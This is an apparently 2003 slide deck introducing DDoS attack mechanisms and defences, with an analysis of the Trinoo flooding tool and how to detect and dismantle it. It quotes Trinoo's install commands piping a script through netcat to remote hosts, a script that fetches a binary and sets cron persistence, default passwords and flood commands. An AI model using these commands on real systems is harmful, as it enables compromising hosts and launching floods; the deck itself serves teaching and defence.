Transcript Victim

An Introduction to DDoS
And the “Trinoo” Attack Tool
Prepared by Ray Lam, Ivan Wong
July 10, 2003
Outline

Background on DDoS



Attack mechanism
Ways to defend
The attack tool – Trinoo




Introduction
Attack scenario
Symptoms and defense
Weaknesses and next evolution
Background on DDoS
Attack mechanism
Denial-Of-Service


Flooding-based
Send packets to victims
Network resources
 System resources


Traditional DOS


One attacker
Distributed DOS

Countless attackers
Attack Mechanism

Direct Attack
A
TCP SYN-ACK, TCP
RST, ICMP, UDP..
TCP SYN, ICMP, UDP
With R’s Address as
source IP address.
R
V

Reflector Attack
A
TCP SYN, ICMP, UDP.. With V’s
Address as source IP address.
R
V
TCP SYN-ACK, TCP RST, ICMP,
UDP..
Attack Architecture
A
A
Masters (handlers)
Masters (handlers)
Agents (Daemons or Zombies)
Agents (Daemons or Zombies)
TCP SYN,
ICMP,
UDP..
(with V’s
address as
the source
IP
addresses)
Reflectors
TCP SYN, ICMP,
UDP.. (the source
IP addresses are
usually spoofed)
V
Direct Attack
TCP SYN-ACK,
TCP RST, ICMP,
UDP..
V
Reflector Attack
Attack Methods
Attack packets
Reply packets
Smurf
ICMP echo queries to
broadcast address
ICMP echo replies
SYN flooding
TCP SYN packets
TCP SYN ACK
packets
RST flooding
TCP packets to closed ports
TCP RST packets
ICMP
flooding
ICMP
queries
UDP packets to closed ports
IP packets with low TTL
ICMP
DNS reply
flooding
DNS queries (recursive) to
DNS servers
DNS replies
replies
Port unreachable
Time exceeded
BackScatter Analysis (Moore et al.)




Measured DOS activity on the Internet.
TCP (94+ %)
UDP (2 %)
ICMP (2 %)
TCP attacks based mainly on SYN
flooding
Background on DDoS
Ways to defend
Strategy

Three lines of defense:



Attack prevention
- before the attack
Attack detection and filtering
- during the attack
Attack source traceback
- during and after the attack
Attack prevention



Protect hosts from installation of
masters and agents by attackers
Scan hosts for symptoms of agents
being installed
Monitor network traffic for known
message exchanges among attackers,
masters, agents
Attack prevention



Inadequate and hard to deploy
Don’t-care users leave security holes
ISP and enterprise networks do not
have incentives
Attack source traceback



Identify actual origin of packet
Without relying on source IP of packet
2 approaches


Routers record info of packets
Routers send additional info of packets to
destination
Attack source traceback

Source traceback cannot stop ongoing
DDoS attack



Cannot trace origins behind firewalls,
NAT (network address translators)
More to do for reflector attack (attack
packets from legitimate sources)
Useful in post-attack law enforcement
Attack detection and filtering

Detection


Identify DDoS attack and attack packets
Filtering


Classify normal and attack packets
Drop attack packets
Attack detection and filtering

Can be done in 4 places






Victim’s network
Victim’s ISP network
Further upstream ISP network
Attack source networks
Dispersed agents send packets to
single victim
Like pouring packets from top of funnel
Attack detection and filtering
Victim’s ISP network
Victim’s network
Victim
Effectiveness of filtering increases
Further upstream
ISP networks
Effectiveness of detection increases
Attack source
networks
Attack detection and filtering

Detection



Easy at victim’s network – large amount of
attack packets
Difficult at individual agent’s network – small
amount of attack packets
Filtering


Effective at agents’ networks – less likely to drop
normal packets
Ineffective at victim’s network – more normal
packets are dropped
D&F at agent’s network


Usually cannot detect DDoS attack
Can filter attack packets with address
spoofed



Attack packets in direct attacks
Attack packets from agents to reflectors
in reflector attacks
Ensuring all ISPs to install ingress
packet filtering is impossible
D&F at victim’s network

Detect DDoS attack



Unusually high volume of incoming traffic of
certain packet types
Degraded server and network performance
Filtering is ineffective



Attack and normal packets have same
destination – victim’s IP and port
Attack packets have source IP spoofed or come
from many different IPs
Attack and normal packets indistinguishable
D&F at victim’s upstream ISP


Often requested by victim to filter
attack packets
Alert protocol




Victim cannot receive ACK from ISP
Requires strong authentication and
encryption
Filtering ineffective
ISP network may also be jammed
D&F at further upstream ISP



Backpressure approach
Victim detects DDoS attack
Upstream ISPs filter attack packets
The attack tool – Trinoo
Introduction
Introduction




Discovered in August 1999
Daemons found on Solaris 2.x
systems
Attack a system in University of
Minnesota
Victim unusable for 2 days
Attack type


UDP flooding
Default size of UDP packet: 1000
bytes



malloc() buffer of this size and send
uninitialized content
Default period of attack: 120 seconds
Destination port: randomly chosen
from 0 – 65534
The attack tool – Trinoo
Attack scenario
Installation
1.
Hack an account

Acts as repository


Scanning tools, attack tools, Trinoo daemons,
Trinoo maters, etc.
Requirements



High bandwidth connection
Large number of users
Little administrative oversight
Installation
2.
Compromise systems

Look for vulnerable systems


Remote buffer overflow exploitation



Unpatched Sun Solaris and Linux
Set up root account
Open TCP ports
Keep a `friend list`
Installation
3.
Install daemons

Use “netcat” (“nc”) and “trin.sh”
./trin.sh | nc 128.aaa.167.217 1524 &
./trin.sh | nc 128.aaa.167.218 1524 &

netcat


Network version of “cat”
trin.sh

Shell script to set up daemons
Installation

trin.sh
echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"
echo "echo rcp is done moving binary"
echo "chmod +x /usr/sbin/rpc.listen"
echo "echo launching trinoo"
echo "/usr/sbin/rpc.listen"
echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"
echo "crontab cron"
echo "echo launched"
echo "exit"
Architecture
Attacker
Masters (handlers)
Agents (Daemons or Zombies)
Victim
Direct Attack
Communication ports
Attacker
Master
Daemon
Port 31335
UDP
TCP
Port 27665

UDP
Port 27444
Monitor specific ports to detect presence of
master, agent
Password protection




Password used to prevent administrators or
other hackers to take control
Encrypted password compiled into master
and daemon using crypt()
Clear-text password is sent over network –
session is not encrypted
Received password is encrypted and
compared
Password protection

Default passwords




“l44adsl” – trinoo daemon password
“gOrave” – trinoo master server startup
“betaalmostdone” – trinoo master remote
interface password
“killme” – trinoo master password to
control “mdie” command
Login to master



Telnet to port 27665 of the host with master
Enter password “betaalmostdone”
Warn if others try to connect the master
[root@r2 root]# telnet r1 27665
Trying 192.168.249.201...
Connected to r1.router (192.168.249.201).
Escape character is '^]'.
betaalmostdone
trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]
trinoo>
Master and daemon


Communicate by UDP packets
Command line format




arg1 password arg2
Default password is “l44adsl”
When daemon starts, it sends “HELLO”
to master
Master maintains list of daemon
Master commands

dos IP



mdos <ip1:ip2:ip3>


DoS the IP address specified
“aaa l44adsl IP” sent to each daemon
DoS the IPs simultaneously
mtimer N

Set attack period to N seconds
Master commands

bcast


mdie password


List all daemons’ IP
Shutdown all daemons
killdead


Invite all daemons to send “HELLO” to
master
Delete all dead daemons from the list
Daemon commands


Not directly used; only used by master
to send commands to daemons
Consist of 3 letters

Avoid exposing the commands by using
Unix command “strings” on the binary
Daemon commands

aaa password IP


bbb password N


DoS specified IP
Set attack period to N seconds
rsz password N

Set attack packet size to N bytes
The attack tool – Trinoo
Symptoms and defense
Symptoms

Masters

Crontab
* * * * * /usr/sbin/rpc.listen

Friend list


…
…-b
# ls -l ... ...-b
-rw------- 1 root
-rw------- 1 root
root
root
25 Sep 26 14:46 ...
50 Sep 26 14:30 ...-b
Symptoms

Masters (Con’t)

Socket status
# netstat -a --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address
Foreign Address
State
tcp
0
0
*:27665
*:*
LISTEN
...
udp
0
0
*:31335
*:*
...
Symptoms

Masters (Con’t)

File status
# lsof | egrep ":31335|:27665"
master 1292 root 3u inet
master 1292 root 4u inet
# lsof -p 1292
COMMAND PID USER
master
1292 root
master
1292 root
master
1292 root
master
1292 root
master
1292 root
2460
2461
FD TYPE DEVICE
cwd DIR 3,1
rtd
DIR 3,1
txt REG 3,1
mem REG 3,1
mem REG 3,1
UDP *:31335
TCP *:27665 (LISTEN)
SIZE NODE NAME
1024 14356 /tmp/...
1024 2
/
30492 14357 /tmp/.../master
342206 28976 /lib/ld-2.1.1.so
63878 29116 /lib/libcrypt-2.1.1.so
Symptoms

Daemons

Socket status
# netstat -a --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address
Foreign Address
...
udp
0
0
*:1024
*:*
udp
0
0
*:27444
*:*
...
State
Symptoms

Daemons (Con’t)

File status
# lsof | egrep ":27444"
ns
1316 root 3u inet
2502
UDP *:27444
# lsof -p 1316
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
ns
1316 root cwd DIR 3,1
1024 153694 /tmp/...
ns
1316 root rtd
DIR 3,1
1024 2 /
ns
1316 root txt REG 3,1
6156 153711 /tmp/.../ns
ns
1316 root mem REG 3,1 342206 28976 /lib/ld-2.1.1.so
ns
1316 root mem REG 3,1 63878 29116 /lib/libcrypt-2.1.1.so
ns
1316 root mem REG 3,1 4016683 29115 /lib/libc-2.1.1.so
Defenses

Prevent root level compromise
Patch systems
 Set up firewalls
 Monitor traffics


Block abused ports
High numbered UDP ports
 Trade off


Also block normal programs using the same
ports
The attack tool – Trinoo
Weaknesses and next evolution
Weaknesses

Single kind of attack



UDP flooding
Easily defended by single defense tools
Use IP as destination address

“Moving target defense” – victim changes
IP to avoid attack
Weaknesses

Password, encrypted password,
commands visible in binary images



Use Unix command “strings” to obtain
- strings master
- strings –n3 ns
Check if Trinoo found
Crack the encrypted passwords
Weaknesses

Password travels in plain text in
network


Daemon password frequently sent in
master-to-daemon commands
Get password by “ngrep”, “tcpdump”
which show UDP payload
Uproot a Trinoo network




Locate a daemon
Use “strings” to obtain IPs of masters
Contact sites with master installed
Those sites check list of daemons




By inspecting file “…” or get master login
password and use “bcast” command
Get “mdie” password
Use “mdie” to shut down all daemons
“mdie” periodically as daemons restarted by
crontab
Next evolution

Combination of several attack types





SYN flood, UDP flood, ICMP flood…
Higher chance of successful attack
Stronger encryption of embedded
strings, passwords
Use encrypted communication channel
Communicate by protocol difficult to be
detected or blocked, e.g. ICMP
References


R. Chang, “Defending against FloodingBased Distributed Denial-of-Service Attacks:
A Tutorial,” Oct. 2002
D. Dittrich, “The DoS Project’s ‘Trinoo’
Distributed Denial of Service Attack Tool,”
http://staff.washington.edu/dittrich/misc/trino
o.analysis.txt, Oct. 1999
Open Discussion